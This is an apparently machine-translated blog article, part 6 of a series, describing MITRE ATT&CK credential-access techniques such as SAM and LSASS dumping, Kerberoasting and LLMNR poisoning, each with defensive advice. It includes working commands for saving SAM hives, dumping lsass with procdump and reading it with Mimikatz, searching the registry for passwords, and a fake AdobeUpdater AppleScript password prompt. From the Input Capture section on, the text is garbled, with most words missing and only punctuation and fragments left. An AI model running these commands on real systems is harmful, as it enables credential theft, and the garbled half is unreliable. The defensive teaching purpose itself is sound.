We study Adversarial Tactics, Techniques & Common Knowledge (ATT @ CK). Enterprise Tactics. Part 6

Retrieving credentials (Credential Access)

Links to all parts:
Part 1. Getting Initial Access
Part 2. Execution
Part 3. Persistence
Part 4. Privilege Escalation
Part 5. Defense Evasion
Part 6. Obtaining Credential Access
Part 7. Discovery
Part 8. Lateral Movement (Lateral Movement)

Having obtained the credentials, the attacker gains access or even control over the system, domain or service (technological) accounts. The adversary is likely to try to get legitimate credentials of user and administrative accounts in order to identify himself in the system and get all the permissions of the captured account, thereby making it harder for the defense party to detect malicious activity. The opponent can also, if possible, create accounts for the purpose of their subsequent use in the attacked environment.

The author is not responsible for the possible consequences of the application of the information contained in the article, and also apologizes for any inaccuracies in some formulations and terms. The published information is a free recount of the content of MITER ATT & CK .

Account Manipulation (Account Manipulation)

System: Windows
Rights: Administrator
Description: Manipulating accounts is aimed at maintaining a certain level of access rights in the attacked environment. Manipulations involve changing permissions, account settings and how to authenticate it, adding or changing access groups. The actions of the attacker can be aimed at undermining security policies, such as password expiration, in order to extend the life of compromised accounts. To create or manage accounts, the adversary must already have sufficient permissions in the system or domain.
')
Security recommendations: Use multifactor authentication. Protect domain controllers by restricting access to these systems. Eliminate the use of domain administrator accounts in unprivileged systems and for day-to-day operations that may contribute to their compromise.

Bash history

System: Linux, macOS
Rights: User
Description: Bash tracks user commands using the History utility. When the user logs out, the history is saved to the file ~ / .bash_history . As a rule, this file contains the last 500 user commands. Often, in the command parameters the user specifies the username and password, which will also be saved in ~ / .bash_history when the user logs off. Attackers can view the ~ / .bash_history files of various system users in the hope of getting their credentials.

Security Tips: There are several ways to prevent the command history from being written to the ~ / .bash_history file:
• set + o history - disable recording;
• set -o history - resume recording;
• unset HISTFILE — add to bash_rc file;
• ln -s / dev / null ~ / .bash_history — write command history to / dev / null .

Brute force or brute force (Brute Force)

System: Windows, Linux, macOS
Rights: User
Description: An adversary can use password recovery tools when credentials are unknown or when he cannot get a password hash. Opponents can use systematic selection techniques, calculating the appropriate cache or using rainbow tables. Hacking is usually done outside the attacked system. Without knowing the password, attackers may try to log in using an empty password value or a value from the list of possible passwords. Depending on the password policy, such actions can lead to numerous authentication errors and account lockout, so the adversary can use the so-called password sraying, the essence of which is to search for the most popular or probable passwords with different accounts. This reduces the likelihood of blocking that occurs when searching for multiple passwords with only one account.

Security Tips : Apply account blocking policies after a certain number of failed login attempts. Consider using multifactor authentication. Follow the recommendations to prevent unauthorized access to existing accounts (see protection recommendations for the “ Valid accounts ” equipment) .

Credential Dumping

System: Windows, Linux, macOS
Rights: Administrator, System, root
Description: Dumping credentials ( English dumping - "waste disposal" ) - the process of obtaining usernames and passwords, usually in the form of a hash or text password from the operating system or software. Tools for dumping credentials can be used by both attackers and security testers.

Windows
SAM (Account Manager)
SAM is a database of local host accounts. As a rule, SAM stores accounts that are shown by the " net user " command. Read SAM requires system level access. There are many tools for extracting SAM data from memory:
• pwdumpx.exe ;
• gsecdump ;
• Mimikatz ;
• secretdump.py .

The SAM file can be extracted from the registry using the REG utility:

reg save HKLM\sam sam;
reg save HKLM\system system.

Next, Creddump7 will help extract hashes from the SAM database.
Note: Rid 500 is the built-in local administrator account. Rid 501 is a guest account. User accounts start with Rid 1000+ .

Cached credentials (DCC2)
Domain Cached Credentials v2 (DCC2) is a credential cache used in Windows Vista and later to authenticate a user when a domain controller is unavailable. The number of cached accounts can be individually for each system. This hash is not subject to pass-the-hash attacks. To retrieve a SAM file from memory, use the following. instruments:
• pwdumpx.exe ;
• gsecdump ;
• Mimikatz ;
• secretdump.py
Alternatively, Reg or Creddump7 can also be used. Credential caching in Windows Vista is performed using PBKDF2 (the standard for generating a key from a password).

Local Security Authority (LSA) Secrets
LSA Secrets are cached credential repositories in which the system stores credentials, including user passwords, service accounts, InternetExpolorer passwords, SQL and other private data, such as encryption keys for cached domain passwords. With System level permissions, you can access LSA Secrets stored in the registry:
HKEY_LOCAL_MACHINE \ SECURITY \ Policy \ Secrets .
When services start in the context of a local or domain account, their passwords are stored in the registry. If automatic login is enabled, private account information is also stored in the registry. By analogy with the previous dumping methods, all the same tools are used to attack LSA Secret:
• pwdumpx.exe ;
• gsecdump ;
• Mimikatz ;
• secretdump.py
The SAM file can be extracted from the registry using the REG utility, and credentials using Creddump7. Passwords extracted from LSA Secret are encoded in UTF-16, i.e. plain text. In Windows 10, additional security measures LSA Secret are used.

NTDS from Domain Controller
For authentication and authorization, AD stores information about domain members — devices and users. The AD database is stored by default on a domain controller in the % SystemRoot% \ NTDS \ Ntds.dit file .
The following methods and tools are used to extract hashes from the AD database:
• Volume Shadow Copy (shadow copy of the volume);
• ntdsutil.exe;
• secretdump.py;
• Invoke-NinjaCopy .

Group Policy Preference (GPP) Files
GPP or group policy preferences are XML files that describe various parameters of domain policies, such as mounting a network drive in the context of a specific account or pre-installing local accounts in domain systems. Such files may contain credentials. Group policies are stored in the SYSVOL domain controller, so any user can read GPP files and try to decrypt the passwords contained in them using the following. tools:
• Metasploit (post / windows / gather / credentials / gpp);
• Get-GPPPassword;
• gpprefdecrypt.py.
To identify all XML files on the SYSVOL resource, you can use the command:
dir /s *.xml .

Service Principal Names (SPNs)
see the Kerberoasting technique

Plaintext Credentials
After the user is logged in, many credentials are generated and stored in the local Author Authority Subsystem Service (LSASS) process. These credentials can be collected by the administrator or System.

SSPI (Security Support Provider Interface) provides a common interface for several Security Support Providers (SSPs). SSP are software modules (DLLs) containing one or more authentication and cryptography schemes that are loaded into the LSASS process at system startup.

Some SSPs can be used to obtain credentials:
• Msv: interactive login to the system, login as a batch job (batch logon), for example, launch tasks of the Task Scheduler service, log in as a service through the MSV authentication package;
• Wdigest: Digest Authentication Protocol is designed for network authentication using the HTTP and SASL (Simple Authentication Security Layer);
• Kerberos: provides domain authentication in Windows 2000 and later versions;
• CredSSP: SSO (Single Sign-On - single sign-on allows users to authenticate once and access resources without entering credentials) and Network Level Authentication (used for authentication in Remote Desktop Services).

Credential Tools:
• Windows credential Editor;
• Mimikatz.

A dump of the LSASS process can be saved for later analysis in another system.
The following command is executed on the target host:
procdump -ma lsass.exe lsass_dump

Next, on another system, Mimikatz runs:

securlsa::Minidump lsassdump.dmp
sekurelsa::logonPasswords

securlsa::Minidump lsassdump.dmp
sekurelsa::logonPasswords

.

DCSync
DCSync is a form of dumping credentials from a domain controller. By abusing the domain controller API, instead of using malicious code that can be identified, an attacker can imitate the replication process from a remote domain controller. Members of Administrators, Domain Admins, Enterprise Admins, or computer accounts can run DCSync to retrieve password information from AD, which can include domain account hashes such as the Key Distribution Center Service Account (KRBTGT) used in Windows 2000 to run the Key Distribution Center service. and Administrator. Then hashes can be used to create a Golden Ticket and to conduct an Pass the Ticket attack or change the password within account manipulation (Account Manipulation). DXSync functionality is included in the lsadump module, which is part of Mimikatz. Lsadump also supports NetSync for replication over the legacy protocol.

Linux
Proc file system
Proc is a special file system in Unix-like operating systems that presents information about processes and other system information in the form of a hierarchical pseudo-file structure (files do not exist on disk, but in RAM), which acts as an interface for interacting with the space of the OS kernel. Processes running as root can clear the memory of other running programs. If the program stores passwords in clear-text or as hash in its memory, these values can be extracted from \ Proc for further use or an attempt to recover the password from the hash. Gnome Keyring, sshd and Apache use memory to store such authentication "artifacts". The above functionality is implemented in an open source tool - MimiPenguin, which unloads the process memory and then searches for passwords and hashes in text strings and regex templates.

Protection recommendations:
Windows
Attempt to track access to LSASS and SAM by the tools allowed in the protected system. Restrict account rights in various systems and network segments in order to prevent an attacker from moving through the protected network in the event of receiving passwords and hashes. Ensure that the local administrator credentials have complex and unique passwords on all systems and network segments. Do not place user or domain administrator accounts in local administrator groups on different systems, because this is equivalent to the fact that all administrators have the same password. Follow Microsoft’s corporate network design and administration guidelines . In Windows 8.1 and Windows Server 2012 R2, enable LSA (Protected Process Light) process security.

Identify and block potentially dangerous and malicious software that can be used to get credential dumps.

In Windows 10, a new mechanism is used to protect LSA Secrets - Credential Guard in Windows Defender. With its appearance, the LSA process does not store private data in memory, but interacts with a new component — an isolated process that is responsible for storing and protecting LSA Secrets. Data stored in an isolated process is protected by virtualization and is not accessible to the rest of the operating system. LSA interacts with an isolated process using remote procedure call (RPC). Credential Guard is not configured by default and has hardware and software requirements. However, it is also not an absolute protection against all forms of dumping credentials.

Manage Replicating Directory Changes access and other permissions related to domain controller replication. Consider disabling or limiting NTLM traffic. Consider the need to monitor the processes and arguments of program launch commands that may act as indicators for dumping credentials. For example, remote access tools may contain tools such as Mimikatz or PowerShell scripts such as Invoke-Mimikatz PowerSploit.

Monitor the replication logs of domain controllers for unscheduled replications or replication requests. Also monitor traffic containing requests for replication from third-party IP addresses.

Linux
To obtain passwords and hashes from memory, the process must open the file / proc / PID / maps in the system, where the PID is the unique pid of the process. The AuditD monitoring tool can be used to identify hostile processes opening this file and warning about the pid, process name and other arguments of the monitored program.

Credentials Files (Credentials in Files)

System: Windows, Linux, macOS
Rights: Administrator, System, root
Description: Attackers can search files containing passwords in local file systems and remote shared folders. These can be user-created files to store their own credentials, shared credential storage of a group of people, configuration files containing passwords for systems or services, source code files, and binary files containing passwords.
Using credential dumping tools, passwords can also be extracted from backups, images and snapshots of virtual machines. In addition, passwords may be contained in Group Policy settings (GPP) files stored on a domain controller.

Security Tips : Use organizational measures that prohibit storing passwords in files. Make sure that developers and system administrators are aware of the risks associated with storing passwords in clear text in software configuration files. Periodically monitor the presence of files on your system that contain passwords and then delete them. Restrict the sharing of files in certain directories by granting permissions only to the necessary users. Delete GPP files containing vulnerable Group Policy settings.

Credentials in Registry

System: Windows
Rights: User, Administrator
Description: Attackers can search the Windows registry for credentials and passwords that are stored there for use by programs or services, sometimes credentials are stored for automatic login. Examples of commands for searching password information:

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Recommendations about protection: Do not store credentials in the registry. Monitor the registry for credentials. When it is necessary to store credentials, the software should restrict their permissions in order to prevent the possibility of their abuse.

Exploit for Credential Access Exploits

System: Windows, Linux, macOS
Rights: User
Description: Errors made by the developers of authentication and authorization mechanisms may be the cause of software vulnerabilities in which an attacker can gain unauthorized access to credentials. For example, bulletin MS14-068 describes a vulnerability in the Kerberos protocol, with which an attacker can fake Kerberos tickets using domain user rights. Exploiting vulnerabilities to obtain credentials can also be used to elevate privileges.

Security recommendations: Regularly update software using centralized installation management updates for workstations and servers of the enterprise. Develop and implement a process for identifying and analyzing cyber threats within which threats relevant to your enterprise will be determined. Use sandboxes, virtualization tools, and microsegmentation to make it more difficult for an attacker to advance through exploitation of vulnerabilities. In Windows, tools are available to detect activity related to the exploitation of vulnerabilities, we are talking about Windows Defender Exploit Guard (WDEG) and Enchanced Mitigation Experience Toolkit (EMET). Another way to prevent the exploitation of vulnerabilities is to use the Control-flow integrity (CFI) tools. CFI is a generic name for methods aimed at limiting the possible ways to execute a program within a predefined control flow graph. However, many protection methods may not work if the malware is designed to protect against protective measures, it also depends on the architecture of the program being analyzed and its binary files.

Forced Authentication

System: Windows
Rights: User
Description: Server Message Block (SMB) is commonly used for authentication and communication between windows-based systems as part of resource sharing and network file folders. When Windows tries to connect to a remote system via SMB, it automatically tries to authenticate the user and sends the current user credentials to the remote system, so the user does not need to enter credentials to gain access to network resources, which is typical of the corporate environment. As a backup resource sharing protocol, in the event of a SMB infrastructure failure, the Web Distributed Authoring and Versioning (WebDAV) protocol can be used, which is an extension of the HTTP protocol and usually works through TCP ports 80 and 443.

By invoking SMB forcible authentication, attackers can abuse the behavior of the system being attacked while connecting to a remote system and get account hashes. With the help of phishing techniques, the enemy can send the victim a link to a controlled external resource or place a special file on the desktop or on a shared resource. When the user system accesses an unreliable resource, it will attempt to authenticate and send the current user’s hash credentials via SMB to the remote server. After receiving a hash, an attacker can perform offline brute-force and get the credentials in clear text or use them for Pass-the-Hash attacks.

Consider the most popular ways to invoke forced SMB authentication:
• Phishing attachment containing a document with active content, which is automatically loaded when you open the document. The document may include a file [:] // request [remote address] /Normal.dotm/, which initiates SMB authentication.

• A modified .lnk or .SCF file (Windows Explorer Command File) containing in its properties, instead of the path to the file's icon, an external link \ [remote address] \ pic.png. Thus, the system will try to download the file icon and open the link.

Security Recommendations: Block outgoing SMB traffic sent outside the corporate network by filtering and blocking TCP ports 139, 445 and UDP port 137. Filter and block WebDAV traffic out of the corporate network. If access to external resources via SMB and WebDAV is necessary, then limit external connections using whitelists.

Hooking

System: Windows
Rights: Administrator, System
Description: Windows API functions are usually stored in DLLs. The interception technique is to redirect calls to API functions by:

• Hook procedures are built-in procedures in the OS that execute code when calling various events, such as pressing keys or moving a mouse;

• Modifications of the address table (IAT), in which the pointers to the API functions are stored. This will allow to “deceive” the attacked application by forcing it to launch the malicious function;

• Directly changing a function (splicing), during which the first 5 bytes of the function are changed, instead of which the transition to a malicious or other function defined by the attacker is inserted.

Like injections, attackers can use hooking to execute malicious code, disguise its execution, access the memory of the attacked process, and elevate privileges. Attackers can capture API calls that include parameters containing authentication data.
Hooking is usually used by rootkits to hide malicious activity in the system.

Protection recommendations: Interception of events in the OS is part of the normal operation of the system, so any restriction of this functionality may adversely affect the stability of legitimate applications, such as antivirus software. Efforts to prevent the use of interception techniques need to be focused on the earlier stages of the killchain chain. hooking- SetWindowsHookEx SetWinEventHook, , , , , ..

(Input Capture)

: Windows, Linux, macOS
: , System
: .
— , , UAC- (Windows Credential Providers). , .

, VPN. , .

: - AppLocker . , .

Microsoft (https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach).

. API SetWindowsHook, GetKeyState, GetAsyncKeyState. API- , , . (Custom Credential Provider):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers .

(Input Prompt)

: macOS
:
: , , . , . AppleScript:

set thePassword to the text returned of (display dialog "AdobeUpdater needs permission to check for updates. Please authenticate." default answer "")

, , .

: , . AppleScript .

Kerberoasting

: Windows
:
: — Service Principal Name (SPN), Kerberos. SPN , SPN AD.

, Kerberos ticket-granting ticket (TGT) Kerberos ticket-granting service (TGS) (service ticket) SPN, . RC4, Kerberos 5 TGS-REP etype 23, , SPN (. Kerberos) . , . , .

: ( 25+ ) . Windows Server 2012 Group Managed Service Accounts (gMSA), () . .

, Domain Admins.
AES Kerboros , RC4.

Kerberos Service Ticket Operations Kerberos TGS. , , Event ID 4769 — , , , RC4 (Ticket Encryption Type: 0x17).

Keychain

: macOS
: root
: Keychain (. « ») — macOS , WiFi, -, , Kerberos. Keychain :
• ~/Library/Keychains;
• /Library/Keychains;
• /Network/Linrary/Keychains/.

macOS Security .
, . , , keychains . , Keychains .

: Keychains — , .

LLMNR/NBT-NS (LLMNR/NBT-NS Poisoning)

: Windows
:
: Link-Local Multicast Name Resolution (LLMNR) NetBIOS Name Service (NBT-NS) — , Windows, . LLMNR DNS DNS. NBT-NS NetBIOS-.

, LLMNR (UDP5355)/NBT-NS(UDP137), . /, NTLMv2 - . , .
, : NBNSpoof, Metasploit Responder.

: LLMNR NBT-NS . , LLMNR/NBT-NS-.
, LLMNR :
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast=dword:00000000 .
LLMNR/NBT-NS , UDP5355 UDP137 .

(Network Sniffing)

: Windows, Linux, macOS
: promiscuos mode («» ), span- ( ) , .
. LLMNR/NBT-NS -, - .

( , , IP-, , VLAN ID ..) / .

: , . , Kerberos, SSL . span-, ARP/DNS .
- , .

DLL- (Password Filter DLL)

: Windows
: , System
: Windows — . DLL-, . DLL .

Security Accounts Manager (SAM), Local Security Authority (LSA) . .

. LSA . .

: , . DLL C:\Windows\System32\ :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\[Notification Packages] .
, lsass.exe

All Articles